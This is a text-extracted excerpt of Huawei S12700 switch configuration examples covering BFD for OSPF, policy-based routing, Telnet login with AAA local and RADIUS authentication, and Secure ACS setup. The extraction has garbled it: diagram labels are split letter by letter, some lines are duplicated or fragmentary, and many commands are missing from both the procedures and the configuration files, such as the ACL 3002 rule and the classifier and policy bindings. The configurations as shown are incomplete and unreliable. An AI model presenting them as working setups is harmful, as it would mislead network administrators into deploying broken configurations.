1 0 .3 .3 .1 /2 4 1 0 .3 .3 .2 /2 4
S w it c h A V L A N IF 3 0 V L A N IF 3 0 S w it c h B
G E 1 /0 /2 G E 1 /0 /1
G E 1 /0 /3
G E 1 /0 /1 V L A N IF 4 0
G E 1 /0 /2
V L A N IF 1 0 1 7 2 .1 6 .1 .1 /2 4
V L A N IF 2 0
1 0 .1 .1 .1 /2 4
1 0 .2 .2 .2 /2 4
G E 1 /0 /1 G E 1 /0 /2
1 0 .1 .1 .2 /2 4 1 0 .2 .2 .1 /2 4
S w it c h C
1. Configure basic OSPF functions on SwitchA, SwitchB, and SwitchC to implement basic
connections on the OSPF network.
2. Configure BFD for OSPF on SwitchA, SwitchB, and SwitchC so that services can be
quickly switched to the backup link when the link between SwitchA and SwitchB is
faulty.

Procedure
# Configure SwitchA. The configurations of SwitchB and SwitchC are the same as the

# Configure SwitchA. The configurations of SwitchB and SwitchC are the same as the

# After the preceding configurations, run the display ospf peer command. The neighbor
relationships are set up among SwitchA, SwitchB, and SwitchC. The command output of
SwitchA is used as an example.
[SwitchA] display ospf peer

Neighbors

DR: 10.1.1.2 BDR: 10.1.1.1 MTU: 0
Neighbors

DR: 10.3.3.2 BDR: 10.3.3.1 MTU: 0
# Check the OSPF routing table on SwitchA. You can see the routing entries to SwitchB and
SwitchC. However, the next-hop address of the route to the destination network segment
172.16.1.0/24 is 10.3.3.2, which indicates that the traffic is transmitted on the link
SwitchA→SwitchB.
[SwitchA] display ospf routing

Routing Tables
Routing for Network

10.1.1.0/24 1 Transit 10.1.1.1 10.10.10.1 0.0.0.0
10.3.3.0/24 1 Transit 10.3.3.1 10.10.10.1 0.0.0.0
10.2.2.0/24 2 Transit 10.1.1.2 10.10.10.3 0.0.0.0
10.2.2.0/24 2 Transit 10.3.3.2 10.10.10.3 0.0.0.0
172.16.1.0/24 2 Stub 10.3.3.2 10.10.10.2 0.0.0.0
Total Nets: 5
Step 4 Configure BFD for OSPF.
# Configure BFD for OSPF on SwitchA.

[SwitchA] bfd //Enable BFD globally.
[SwitchA-bfd] quit
[SwitchA] ospf 1
[SwitchA-ospf-1] bfd all-interfaces enable //Enable BFD in OSPF process 1.
# Configure BFD for OSPF on SwitchB.

[SwitchB] bfd //Enable BFD globally.
[SwitchB-bfd] quit
[SwitchB] ospf 1
[SwitchB-ospf-1] bfd all-interfaces enable //Enable BFD in OSPF process 1.
# Configure BFD for OSPF on SwitchC.

[SwitchC] bfd //Enable BFD globally.
[SwitchC-bfd] quit
[SwitchC] ospf 1
[SwitchC-ospf-1] bfd all-interfaces enable //Enable BFD in OSPF process 1.

# After the preceding configurations, run the display ospf bfd session all command on
SwitchA, SwitchB, or SwitchC. The peer BFD session is Up. The command output of
SwitchA is used as an example.
[SwitchA] display ospf bfd session all

Area 0.0.0.0 interface 10.1.1.1(Vlanif10)'s BFD Sessions
NeighborId:10.10.10.3 AreaId:0.0.0.0 Interface:Vlanif10

BFDState:up rx :1000 tx :1000
Multiplier:3 BFD Local Dis:8195 LocalIpAdd:10.1.1.1
RemoteIpAdd:10.1.1.2 Diagnostic Info:No diagnostic information
NeighborId:10.10.10.2 AreaId:0.0.0.0 Interface:Vlanif30


# Run the shutdown command on GE1/0/1 of SwitchB to simulate the link fault.
# Check the OSPF routing table on SwitchA.

[SwitchA] display ospf routing

Routing Tables
Routing for Network

10.1.1.0/24 1 Transit 10.1.1.1 10.10.10.1 0.0.0.0
10.2.2.0/24 2 Transit 10.1.1.2 10.10.10.3 0.0.0.0
172.16.1.0/24 3 Stub 10.1.1.2 10.10.10.2 0.0.0.0
Total Nets: 3
When the link SwitchA-SwitchB is faulty, the backup link SwitchA-SwitchC-SwitchB takes
effect and the next-hop address of the route to the destination network segment 172.16.1.0/24
changes to 10.1.1.2.
----End
Configuration Files
#
sysname SwitchA
#
vlan batch 10 30
#
bfd
#
interface Vlanif10
ip address 10.1.1.1 255.255.255.0
#
interface Vlanif30
ip address 10.3.3.1 255.255.255.0
#


#
#
bfd all-interfaces enable
area 0.0.0.0
network 10.1.1.0 0.0.0.255
network 10.3.3.0 0.0.0.255
#
return
#
sysname SwitchB
#
vlan batch 20 30 40
#
bfd
#
interface Vlanif20
ip address 10.2.2.2 255.255.255.0
#
interface Vlanif30
ip address 10.3.3.2 255.255.255.0
#
interface Vlanif40
ip address 172.16.1.1 255.255.255.0
#
#
#
#
area 0.0.0.0
network 10.2.2.0 0.0.0.255
network 10.3.3.0 0.0.0.255
network 172.16.1.0 0.0.0.255
#
return
#
sysname SwitchC
#
vlan batch 10 20
#
bfd
#
interface Vlanif10
ip address 10.1.1.2 255.255.255.0
#
interface Vlanif20
ip address 10.2.2.1 255.255.255.0
#

#
#
area 0.0.0.0
network 10.1.1.0 0.0.0.255
network 10.2.2.0 0.0.0.255
#
return
9.3 Typical PBR Configuration
9.3.1 Example for Configuring Traffic Policies to Implement

Policy-based Routing (Redirection to Different Next Hops)
Policy-based Routing Overview

Traditionally, a device searches its routing table for routes based on destination addresses of
received packets and then forwards the packets according to the routes. Currently, more users
require packet routing based on user-defined policies. Policy-based routing (PBR) is a data
forwarding mechanism implemented based on user-defined policies.
On S series switches, PBR is implemented by redirecting incoming Layer 3 packets that

match traffic classification rules on an interface to a specified next-hop IP address.
When a specific data flow needs to be transmitted to a specified next hop, PBR can be
configured to meet this requirement. For example, different data flows can be transmitted on
different links to improve link efficiency. Data flows can be directed to security devices such
as firewalls for security filtering. Service data can be transmitted on a low-cost link to reduce
enterprises' data service costs without compromising service quality.
Configuration Notes
l If a device does not have the ARP entry that matches the specified next-hop IP address,
the device triggers ARP learning. If the device cannot learn the ARP entry, packets are
forwarded along the previous forwarding path without being redirected.
l If multiple next-hop IP addresses are configured using the redirect ip-nexthop or
redirect ipv6-nexthop command, the device redirects packets in active/standby link
mode. That is, the device determines active and standby links according to the sequence
in which next-hop IP addresses were configured. The first configured next-hop IP
address has the highest priority and its link functions as the active link, while links of
other next-hop IP addresses function as standby links. When the active link is Down, the
standby link of the second-highest-priority next-hop IP address is selected as the new
active link.
l If multiple next-hop IP addresses are configured using the redirect ip-multihop or
redirect ipv6-multihop command, the device redirects packets in equal-cost route load
balancing mode.
l Table 9-6 lists the products and versions to which this configuration example is
applicable.


Model
S12700 S12708 and V200R005C00, V200R006C00, V200R007C00,

S12712 V200R007C20, V200R008C00, V200R009C00
S12704 V200R008C00, V200R009C00
NOTE
An enterprise network is dual-homed to two external network devices through the Switch, as
shown in Figure 9-11. One uplink is a high-speed link with the gateway at 10.1.20.1/24, and
the other is a low-speed link with the gateway at 10.1.30.1/24.
The enterprise intranet has two network segments: 192.168.1.0/24 and 192.168.2.0/24.
Network segment 192.168.1.0/24 belongs to the server zone and requires high link bandwidth.
Therefore, traffic of this network segment needs to be transmitted on the high-speed link.
Network segment 192.168.2.0/24 is used for Internet access and traffic of this network
segment is transmitted on the low-speed link.
Figure 9-11 PBR networking

VLAN 10 1 0 .1 .2 0 .1 /2 4
1 9 2 .1 6 8 .1 .0 /2 4 G E 1 /0 /1
V L A N IF 1 0 0
G E 1 /0 /1 1 0 .1 .2 0 .2 /2 4
C o re
S w itc h A S w itch N e tw o rk
G E 1 /0 /3 G E 1 /0 /3
G E 1 /0 /2 G E 1 /0 /2
V L A N IF 2 0 0
1 0 .1 .3 0 .2 /2 4 1 0 .1 .3 0 .1 /2 4
VLAN 20
1 9 2 .1 6 8 .2 .0 /2 4
1. Create VLANs, configure interfaces, and configure routes to connect enterprise users to
the external network.
2. Configure ACLs to match data flows of network segments 192.168.1.0 and 192.168.2.0,
respectively.
3. Create traffic classifiers and reference the ACLs to differentiate packets.
4. Configure traffic behaviors to transmit data traffic matching different ACLs on different
links and allow traffic transmitted between the intranet users to pass through first.
5. Configure a traffic policy, bind the traffic classifiers and traffic behaviors to it, and apply
it to the inbound direction of GE1/0/3 on the Switch to implement PBR.

Procedure
Step 1 Create VLANs, configure interfaces, and configure routes for interworking.
# Create VLANs 10 and 20 on SwitchA.

# On Switch, set the link types of the interfaces connected to PCs to access and interface
connected to the Switch to trunk, and add the interfaces to VLANs.
# Create VLANs 10, 20, 100, and 200 on the Switch.

[Switch] vlan batch 10 20 100 200
# On the Switch, set the link types of the interfaces connected to SwitchA to trunk and
interface connected to the external network to access, and add the interfaces to VLANs.
[Switch-GigabitEthernet1/0/3] port trunk allow-pass vlan 10 20
# On the Switch, configure VLANIF10 and VLANIF20 as user gateways and assign IP
addresses 192.168.1.1/24 and 192.168.2.1/24 to them, respectively.
# On the Switch, configure VLANIF 100 and VLANIF 200 to connect to external network
devices and assign IP addresses to 10.1.20.2/24 and 10.1.30.2/24 to them, respectively.

# On the Switch, configure two default routes and set their next-hop IP addresses to IP
addresses of the two external network devices respectively.
[Switch] ip route-static 0.0.0.0 0 10.1.20.1
After the preceding configuration is complete, intranet users can access the external network.
To ensure that data flows of network segments 192.168.1.0/24 and 192.168.2.0/24 are
transmitted on the high-speed link and low-speed link respectively, continue to perform the
following configurations.
Step 2 Configure ACLs.
# On the Switch, create advanced ACLs 3000, 3001, and 3002.
[Switch] acl 3000 //This ACL is used to match data traffic between two network
segments of the intranet. The data traffic does not need to be redirected. If
this configuration is not performed, traffic between the network segments will be
redirected. As a result, communication between the network segments will fail.
[Switch-acl-adv-3000] rule permit ip source 192.168.1.0 0.0.0.255 destination
192.168.2.0 0.0.0.255
192.168.1.0 0.0.0.255
Switch-acl-adv-3000] quit
[Switch] acl 3001 //Match user data traffic of the intranet network segment
192.168.1.0/24.
[Switch-acl-adv-3001] rule permit ip source 192.168.1.0 0.0.0.255
[Switch-acl-adv-3001] quit
[Switch] acl 3002 //Match user data traffic of the intranet network segment
192.168.2.0/24.
Step 3 Configure traffic classifiers.
On the Switch, create traffic classifiers c0, c1, and c2, and bind c0 to ACL 3000, c1 to ACL
3001, and c2 to ACL 3002.
[Switch] traffic classifier c0 operator or
[Switch-classifier-c0] if-match acl 3000
[Switch-classifier-c0] quit
Step 4 Configure traffic behaviors.
# On the Switch, create traffic behaviors b0, b1, and b2, configure the permit action in b0,
and configure actions that redirect packets to IP addresses 10.1.20.1 and 10.1.30.1 in b1 and
b2 respectively.
[Switch] traffic behavior b0
[Switch-behavior-b0] permit
[Switch-behavior-b0] quit
[Switch-behavior-b1] redirect ip-nexthop 10.1.20.1
[Switch-behavior-b2] redirect ip-nexthop 10.1.30.1
Step 5 Configure a traffic policy and apply the traffic policy to an interface.

# On the Switch, create a traffic policy p1 and bind the traffic classifiers and traffic behaviors
to this traffic policy.
[Switch] traffic policy p1
[Switch-trafficpolicy-p1] classifier c0 behavior b0
[Switch-trafficpolicy-p1] quit
# Apply the traffic policy p1 to the inbound direction of GE1/0/3 on the Switch.
[Switch-GigabitEthernet1/0/3] traffic-policy p1 inbound
[Switch-GigabitEthernet1/0/3] return
# Check the ACL configuration.

<Switch> display acl 3000
Advanced ACL 3000, 2 rule
Acl's step is 5
rule 5 permit ip source 192.168.1.0 0.0.0.255 destination 192.168.2.0 0.0.0.255
(match-counter 0)
(match-counter 0)
Acl's step is 5
rule 5 permit ip source 192.168.1.0 0.0.0.255 (match-counter 0)
Acl's step is 5
# Check the traffic classifier configuration.

<Switch> display traffic classifier user-defined
User Defined Classifier Information:
Classifier: c2
Precedence: 15
Operator: OR
Rule(s) : if-match acl 3002
Classifier: c0
Precedence: 5
Operator: OR
Classifier: c1
Precedence: 10
Operator: OR
Total classifier number is 3
# Check the traffic policy configuration.

<Switch> display traffic policy user-defined p1
User Defined Traffic Policy Information:
Policy: p1
Classifier: c0
Operator: OR
Behavior: b0
Permit
Classifier: c1
Operator: OR
Behavior: b1
Permit

Redirect: no forced
Redirect ip-nexthop
10.1.20.1
Classifier: c2
Operator: OR
Behavior: b2
Permit
Redirect: no forced
Redirect ip-nexthop
10.1.30.1
----End
Configuration Files
#
sysname SwitchA
#
vlan batch 10 20
#
#
#
#
return
l Switch configuration file

#
sysname Switch
#
vlan batch 10 20 100 200
#
acl number 3000
0.0.0.255
0.0.0.255
acl number 3001
acl number 3002
#
traffic classifier c0 operator or precedence 5
if-match acl 3000
if-match acl 3001
if-match acl 3002
#
traffic behavior b0
permit
traffic behavior b1
permit
redirect ip-nexthop 10.1.20.1
traffic behavior b2
permit
redirect ip-nexthop 10.1.30.1
#
traffic policy p1 match-order config

classifier c0 behavior b0
#
interface Vlanif10
ip address 192.168.1.1 255.255.255.0
#
interface Vlanif20
ip address 192.168.2.1 255.255.255.0
#
interface Vlanif100
ip address 10.1.20.2 255.255.255.0
#
interface Vlanif200
ip address 10.1.30.2 255.255.255.0
#
#
#
traffic-policy p1 inbound
#
return
Video
How to Configure Redirection for Policy Routing

Typical Configuration Examples 10 Typical User Access and Authentication Configuration
10 Typical User Access and Authentication

Configuration
About This Chapter
10.1 Typical AAA Configuration

10.2 Typical NAC Configuration (Common Mode)
10.3 Typical NAC Configuration (Unified Mode) (V200R007C00 and Earlier Versions,
V200R008C00)
10.4 Typical NAC Configuration (Unified Mode) (V200R007C20, V200R009C00 and Later
Versions)
10.5 Typical NAC Configuration (Unified Mode) (the Agile Controller as the Authentication
Server) (V200R007C00 and Earlier Versions, V200R008C00)
10.6 Typical NAC Configuration (Unified Mode) (the Agile Controller as the Authentication
Server) (V200R007C20, V200R009C00 and Later Versions)

10.1 Typical AAA Configuration
10.1.1 Notice to Be Taken When the Device Connects to Non-

Huawei RADIUS Servers
Notice to Be Taken When the Device Connects to an H3C iMC RADIUS Server
When the device connects to an H3C iMC RADIUS server to perform authentication,
authorization, or accounting for 802.1x users, configure security check policies (for example,
check whether the 802.1x client has two network cards and whether the 802.1x client version
is correct) on the RADIUS server to improve security. In addition, perform the following
operations on the device:
1. Configure RADIUS accounting.
2. Run the dot1x authentication-method eap command to configure EAP relay
authentication for 802.1x users.
3. Run the dot1x eap-notify-packet eap-code 10 data-type 25 command to configure the
device to return the EAP packets with type value of 10 and data type of 25 to the
RADIUS server.
4. Run the radius-attribute translate HW-Up-Priority HW-User-Information receive
command to convert the HW-Up-Priority attribute in the received RADIUS packets into
HW-User-Information.
5. If the RADIUS server needs to dynamically authorize AAA users, the attributes
delivered by security check policy may be different from the attributes delivered by
dynamic authorization. Therefore, run the authorization-modify mode modify
command to set the update mode for user authorization information delivered by the
RADIUS server to Modify. After the command is executed, the attributes delivered by
dynamic authorization will not overwrite the attributes delivered by security check
policy.
Notice to Be Taken When the Device Connects to a Ruijie RADIUS Server

If you want to view the MAC addresses or IP addresses of online users on a Ruijie RADIUS
server, set the device type to H3C or Digital China on the RADIUS server
Notice to Be Taken When the Device Connects to a Leagsoft RADIUS Server

When the NAS-IP of the RADIUS client (device) is configured on the Leagsoft RADIUS
server, the MAC address of the device also needs to be configured.
Notice to Be Taken When the Device Connects to a Symantec RADIUS Server

l The Symantec RADIUS server can only be used as an authentication server, but cannot
be used as an authorization or accounting server. When the device connects to a
Symantec RADIUS server, ensure that the RADIUS server is not configured as an
authorization or accounting server.
l When the Symantec RADIUS server performs 802.1x authentication for users, perform
the following configurations on the device:

– Run the undo dot1x handshake command to disable handshake between the
device and 802.1x online users.
– Run the dot1x authentication-method eap command to configure EAP relay
10.1.2 Example for Configuring Authentication for Telnet Login

Users (AAA Local Authentication)
AAA Local Authentication Overview

Users are locally authenticated through AAA. To log in to a device, a user must enter the
correct user name and password. User information is configured on the local device. There is
no need to deploy an authentication server on the network. Therefore, AAA local
authentication is fast and inexpensive. However, how much user information can be stored
depends on the hardware capacity of the device.
Configuration Notes
l This example applies to all S12700 versions.
l NOTE
As shown in Figure 10-1, administrator needs to remotely manage the device in a simplified
and secure manner. The specific requirements are as follows:
1. The administrator must enter correct user name and password to log in to the device
through Telnet.
2. After logging in to the device through Telnet, the administrator can run the commands at
levels 0-15.
Figure 10-1 Configuring authentication for Telnet login users (AAA local authentication)
Management
Network GE1/0/1
Admin VLANIF10 Switch
10.1.2.10/24
Username: user1
Password: Huawei@1234
1. Enable the Telnet service.
2. Set the authentication method for Telnet login users to AAA.
3. Configure AAA local authentication, including creating a local user, setting the user
access type to Telnet, and setting the user level to 15.

Procedure
Step 1 Configure interfaces and assign IP addresses.
[Switch] interface gigabitethernet1/0/1
Step 2 Enable the Telnet server.

Step 3 Set the authentication method for the VTY user interface to AAA.
[Switch] user-interface maximum-vty 15 //Set the maximum number of VTY login
uses to 15 (The value range varies according to product versions and models). By
default, the maximum number of Telnet users is 5.
[Switch] user-interface vty 0 14 //Enter the VTY 0-14 user view.
[Switch-ui-vty0-14] authentication-mode aaa //Set the authentication method for
the VTY user view to AAA.
Step 4 Configure AAA local authentication.

[Switch] aaa
[Switch-aaa] local-user user1 password irreversible-cipher Huawei@1234 //Create
local user user1 and set the password. The password is displayed in cipher text
in the configuration file, so remmember the password. If you forget the password,
run this command again to reconfigure the password .
[Switch-aaa] local-user user1 service-type telnet //Set the access type of user1
to Telnet. The user can log in through only Telnet (by default, users can log in
through any method in versions earlier than V200R007 and cannot log in through
any method in V200R007 and later versions).
[Switch-aaa] local-user user1 privilege level 15 //Set the user level of user1
to 15. The user can use the commands of level 15 and lower levels.
[Switch-aaa] quit
NOTE
When the entered user name does not contain a domain name, the device authenticates the user using the
default administrative domain default_admin. By default, the default administrative domain uses the
authentication scheme default and accounting scheme default.
l Authentication scheme default: local authentication
l Accounting scheme default: non-accounting

Choose Start > Run on your computer and enter cmd to open the cmd window. Run the
telnet command and enter the user name user1 and password Huawei@1234 to log in to the
device through Telnet.
Username:user1
Password:***********
<Switch>//The administrator successfully logs in.
----End

Configuration Files
#
sysname Switch
#
vlan batch 10
#
#
aaa
local-user user1 password irreversible-cipher %^%#.)P`(ahmeXKljES$}IC%OdjjC
$m)cA#}T(8z4*ZK!_Z+GSo<7C*O8WO,!rt;%^%#
local-user user1 privilege level 15
local-user user1 service-type telnet
#
interface Vlanif10
ip address 10.1.2.10 255.255.255.0
#
#
user-interface maximum-vty 15
#
return

Users (RADIUS Authentication)
RADIUS Authentication Overview

When a RADIUS authentication server is deployed on a network, users can be authenticated
through RADIUS. User information is created and maintained by the RADIUS authentication
server. A user can successfully log in to the device only when the entered user name and
password are the same as those configured on the RADIUS server. Generally, RADIUS
authentication is configured on the network requiring high security, for example, financial,
government, and telecommunication carrier networks.
Configuration Notes
l NOTE
As shown in Figure 10-2, a RADIUS server is deployed on a network. The administrator is
authenticated through RADIUS and Telnet to the device to remotely manage it. The specific
requirements are as follows:
through Telnet.
levels 0-15.

Figure 10-2 Configuring authentication for Telnet login users (RADIUS authentication)
GE1/0/2
VLANIF20
10.1.6.10/24
Management
Network GE1/0/1
VLANIF10
Admin
10.1.2.10/24 Switch RADIUS Server
Username: user1 10.1.6.6/24
3. Configure RADIUS authentication, including creating a RADIUS server template, an
AAA authentication scheme, and a service scheme, and applying the schemes to a
domain.
4. Configure the domain to which the administrator belongs as the default administrative
domain so that the administrator does not need to enter the domain name when logging
in.
NOTE
This example only provides the configurations on the device. Ensure that the required parameters have been
set on the RADIUS server, for example, device's IP address, shared key, and the creating user.
Procedure
[Switch-GigabitEthernet1/0/2
] port link-type access
] port default vlan 20
] quit



# Configure the RADIUS server template to implement communication between the device
and the RADIUS server.
[Switch] radius-server template 1
[Switch-radius-1] radius-server authentication 10.1.6.6 1812 //Specify the IP
address and port number of the RADIUS authentication server.
[Switch-radius-1] radius-server shared-key cipher Hello@1234 //Specify the
shared key of the RADIUS server, which must be the same as that configured on the
RADIUS server.
NOTE
If the RADIUS server does not accept the user names containing domain names, run the undo radius-server
user-name domain-included command on the device so that the packets sent from the device to the
RADIUS server do not contain domain names.
# Configure an AAA authentication scheme and set the authentication mode to RADIUS.
[Switch] aaa
[Switch-aaa] authentication-scheme sch1
[Switch-aaa-authen-sch1] authentication-mode radius
# Configure a service scheme and set the user level to 15.

[Switch-aaa] service-scheme sch1
[Switch-aaa-service-sch1] admin-user privilege level 15
[Switch-aaa-service-sch1] quit
# Apply the AAA authentication scheme, RADIUS server template, and service scheme to the
domain.
[Switch-aaa] domain huawei.com
[Switch-aaa-domain-huawei.com] authentication-scheme sch1
[Switch-aaa-domain-huawei.com] radius-server 1
[Switch-aaa-domain-huawei.com] service-scheme sch1
[Switch-aaa] quit
Step 5 Configure the domain to which the administrator belongs as the default administrative domain
so that the administrator does not need to enter the domain name when logging in to the
device through Telnet.
# Run the test-aaa command on the device to test whether the administrator can pass the
authentication.
[Switch] test-aaa user1 Huawei@1234 radius-template 1
# Choose Start > Run on your computer running Windows operating system and enter cmd
to open the cmd window. Run the telnet command and enter the user name user1 and
password Huawei@1234 to log in to the device through Telnet.


Username:user1
----End
Configuration Files
#
sysname Switch
#
vlan batch 10 20
#
#
#
radius-server shared-key cipher %^%#Zh-H!i<+2RUI,E4_q<''+[14Fmj4@>Aa0pM0H}@D%^%#
#
aaa
service-scheme sch1
admin-user privilege level 15
domain huawei.com
service-scheme sch1
radius-server 1
#
interface Vlanif10
ip address 10.1.2.10 255.255.255.0
#
interface Vlanif20
ip address 10.1.6.10 255.255.255.0
#
#
#
#
return
Related Content
AAA Attribute Query Tool
This tool shows details about AAA attributes on switches. You do not need to register a
Huawei account before using this tool.
AAA Attribute Query Tool


Users (Using the Secure ACS as a RADIUS Authentication
Server)
RADIUS Authentication Overview

When a RADIUS authentication server is deployed on a network, users can be authenticated
through RADIUS. User information is created and maintained by the RADIUS authentication
server. A user can successfully log in to the device only when the entered user name and
password are the same as those configured on the RADIUS server. Generally, RADIUS
authentication is configured on the network requiring high security, for example, financial,
government, and telecommunication carrier networks.
Configuration Notes
l NOTE
l In this example, the RADIUS authentication server is the secure ACS running version
5.2.0.26.
As shown in Figure 10-3, on an enterprise network, an administrator connects to the switch
through a management network and an 802.1x user connects to the switch through an access
network. The enterprise uses ACS to create and maintain user information. The administrator
can log in to the ACS through web.
The administrator and 802.1x user are allocated different accounts and rights to improve
security. The requirements are as follows:
1. The administrator can Telnet to the switch only after entering the user name and
password, and can use the commands from level 0 to level 15 after login.
2. To access the switch, the 802.1x user needs to start the 802.1x client, enter the user name
and password, and be authenticated.
After the 802.1x user accesses the switch:
– The user can use the commands at level 0 to level 2.
– The ACS delivers VLAN 100 and ACL 3000 to the user.
3. The administrator is authenticated in the default domain, and the 802.1x user is
authenticated in the huawei.com domain.

Figure 10-3 Networking of Telnet login user authentication (Using the Secure ACS as a
RADIUS Authentication Server)
M a n a g e m e n t G E 1 /0 /2
N e tw o rk V L A N IF 2 0
G E 1 /0 /1
A d m in 1 0 .1 .2 .1 0 /2 4
V L A N IF 3 0
1 0 .1 .6 .1 0 /2 4
S w itch S e c u re A C S
1 0 .1 .6 .6 /2 4
A cce ss G E 1 /0 /3
1 0 .1 .3 .1 0 /2 4
8 0 2 .1 x u se r
Preparations
Table 10-1 Data used to connect the switch to ACS

Item Data
Administrator's user name and User name: acsadmin

password of the ACS client Password: Admin_123
Administrator's user name and User name: admin1

password of the switch Password: Admin@1234
User name and password of the User name: user1@huawei.com

802.1x user Password: Huawei@1234
Switch name and the IP address Switch name: Switch

of the interface connected to the IP address: 10.1.6.10
ACS
Shared password of switch and Hello@1234

ACS
1. Configure the switch.
a. Configure interfaces and allocate IP addresses to them, so that the switch can
communicate with the ACS.
b. Create a VLAN and an ACL that the ACS will deliver.
c. Enable the Telnet service.
d. Configure AAA authentication for the administrator to Telnet to the switch.
e. Configure RADIUS authentication, including creating the RADIUS server template
and AAA authentication scheme and applying them to the default_admin and
huawei.com domains.

f. Enable 802.1x authentication on the interface that the 802.1x user accesses.
2. Configure the ACS, add access devices and users, and configure an authentication and
authorization profile. Add access policies and bind users to the authentication and
authorization profile.
NOTE
Ensure that the Switch switch and ACS can communicate with each other.
Procedure
Step 1 Configure the switch.
1. Configure interfaces and allocate IP addresses to them, so that the switch can
communicate with the ACS.
[Switch] vlan batch 10 20 30
[Switch-Vlanif10] ip address 10.1.6.10 24 //Configure the IP address used
to communicate with the controller.
[Switch] interface gigabitethernet1/0/1 //Configure the interface used to
connect to administrators.
[Switch] interface gigabitethernet1/0/3 //Configure the interface used to
connect to 802.1x users.
[Switch-GigabitEthernet1/0/3] port link-type hybrid //If the AAA server
needs to deliver VLAN or ACL to access users, the user access interface (with
authentication enabled) on the switch must be a hybrid interface.
2. Create a VLAN and an ACL that the ACS will deliver to access users.
Only the VLAN or ACL that is the same as that configured on the AAA server can be
delivered.
[Switch] vlan 100
[Switch] acl 3000
3. Enable the Telnet server.

4. Set the authentication mode for VTY users to AAA.

[Switch] user-interface maximum-vty 15 //Set the maximum number of VTY
users to 15 (this value varies with versions and models). By default, a
maximum of five Telnet users are supported.
[Switch] user-interface vty 0 14 //Enter the VTY 0-14 user interface view.
[Switch-ui-vty0-14] authentication-mode aaa //Set the authentication mode
for VTY users to AAA.
[Switch-ui-vty0-14] protocol inbound telnet //Configure the VTY user
interface to support Telnet. By default, switches in V200R006 and earlier

versions support Telnet, and switches in V200R007 and later versions support
SSH.
5. Configure RADIUS authentication for access users on the switch.
# Configure a RADIUS server template so that the switch and ACS can communicate
through RADIUS.
[Switch-radius-1] radius-server authentication 10.1.6.6 1812 //Specify the
IP address and port number of the ACS.
[Switch-radius-1] radius-server shared-key cipher Hello@1234 //Set the ACS
shared key, which must be the same as that configured on the ACS.
NOTE
If the user name stored on the AAA server does not contain a domain name, run the undo radius-
server user-name domain-included command. After this command is executed, the user names in the
packets sent from the switch to RADIUS server do not contain domain names.
# Create an AAA authentication scheme and set the authentication mode to RADIUS.
[Switch] aaa
# Apply the AAA authentication scheme and RADIUS server template to the default
administrative domain.
NOTE
Administrators (users accessing the switch through Telnet, SSH, FTP, HTTP, or terminal) are
authenticated in the default administrative domain.
By default, the administrative domain is default_admin.
[Switch-aaa] domain default_admin
[Switch-aaa-domain-default_admin] radius-server 1
[Switch-aaa-domain-default_admin] authentication-scheme sch1
[Switch-aaa-domain-default_admin] quit
# Apply the AAA authentication scheme and RADIUS server template to the
huawei.com domain.
[Switch-aaa-domain-huawei.com] radius-server 1
[Switch-aaa] quit
6. Enable 802.1x authentication on an interface.
# Set the NAC mode to unified mode.

[Switch] authentication unified-mode
NOTE
After a switching between common mode and unified mode, restart the switch to make the
configuration take effect. By default, the unified mode is used.
# Enable 802.1x authentication on interface GE1/0/3.

[Switch-GigabitEthernet1/0/3] authentication dot1x
[Switch-GigabitEthernet1/0/3] dot1x authentication-method eap //This step
is recommended because most 802.1x clients use EAP relay authentication.

Step 2 Configure the secure ACS.

1. Log in to the ACS client and enter the user name and password to open the homepage.
Enter the universal resource locator (URL) address of the ACS and press Enter to open
the ACS login page. Enter the user name and password, and click Login.
NOTE
The ACS's URL address is in the format http://IP/ or https://IP/, for example, http://10.13.1.1/ or https://
10.13.1.1/.
After you log in to the ACS, the homepage is displayed.
Table 10-2 Navigation areas on the ACS client

Navigation Area Description
My Workspace Includes welcome page, configuration instruction of

common tasks, and account information.
To change the administrator password, choose My
Workspace > My Account.
Network Resources Configures network devices, including AAA clients and

network device groups.
Users and Identity Stores Configures the internal users and identities.
Policy Elements Configures the authentication and authorization profiles,

including the matching conditions and results of access
policies.
Access Policies Configures access policies and associates users with

authentication and authorization profiles.
Monitoring and Reports Displays log information.
System Administration Manages and maintains ACS.
2. Add an access device.

a. Choose Network Resources > Network Devices and AAA clients > Create, as
shown in Figure 10-4.

Figure 10-4 Configuring network device and AAA client
b. Enter the switch name and IP address, set the authentication mode between the
switch and ACS to RADIUS, enter the shared secret and CoA port number, and
click Submit, as shown in Figure 10-5.
Figure 10-5 Adding network device and AAA client
3. Add a user.
a. Choose Users and Identity Stores > Internal Identity Stores > Users > Create,

Figure 10-6 Configuring access user
b. Enter the user name, password, and confirm password, and click Submit, as shown
in Figure 10-7.
Figure 10-7 shows the page for adding an 802.1x user. After adding the access user,
add an administrator according to the administrator parameters.
Figure 10-7 Adding a user
4. Add an authentication and authorization profile.

a. Choose Policy Elements > Authorization and Permissions > Network Access >
Authorization Profiles > Create to add an authentication and authorization profile,
NOTE
When you use the RADIUS protocol, it is recommended that you choose Policy Elements >
Authorization and Permissions > Network Access.
When you use the TACACS+ protocol, it is recommended that you choose Policy Elements >
Authorization and Permissions > Authorization Profiles.
Figure 10-8 Add an authentication and authorization profile
b. Add the authentication and authorization profile for the administrator to specify that
the administrator can only log in through Telnet and has a user privilege of 15.
The settings on the General tab page are shown in Figure 10-9.

Figure 10-9 Setting general parameters for the administrator's authentication and
authorization profile
The settings on the RADIUS Attributes tab page are shown in Figure 10-10. Click
Submit to commit the profile configuration.

Figure 10-10 Setting RADIUS attribute parameters for the administrator's

authentication and authorization profile
c. Add an authentication and authorization profile for an 802.1x user to specify that
the user can only log in through 802.1x and has a user privilege of 2 and ACS
delivers ACL 3000 and VLAN 100, as shown in Figure 10-11, Figure 10-12, and
Figure 10-13. Click Submit to commit the profile configuration.

Figure 10-11 Setting general parameters for the 802.1x user's authentication and
authorization profile

Figure 10-12 Setting common task parameters for the 802.1x user's authentication
and authorization profile
Figure 10-13 Setting RADIUS attribute parameters for the 802.1x user's
authentication and authorization profile

5. Add an access policy to bind the user to an authentication and authorization profile.
a. Create an access service and choose Access Policies > Access Services > Create.
b. Configure the access service. Set the communication mode to Network Access and
specify the user access protocol, as shown in Figure 10-14 and Figure 10-15.
Figure 10-14 Setting the communication mode to Network Access
NOTE
The S series switches support the first five user access protocols.
Figure 10-15 User access protocols
c. Choose Access Policies > Access Services > Service Selection Rules to create a
rule, as shown in Figure 10-16.

Figure 10-16 Creating a rule
d. Configure the rule. Set the authentication mode to RADIUS and add attributes
according to Figure 10-17.
You can choose Access Policies > Access Services > Service Selection Rules to
prepare the attributes that you want to add.

Figure 10-17 Configuring the rule
Click OK, and then click Save Changes.

e. Select the created access service and click Identity to add an Identity rule, as shown
in Figure 10-18.

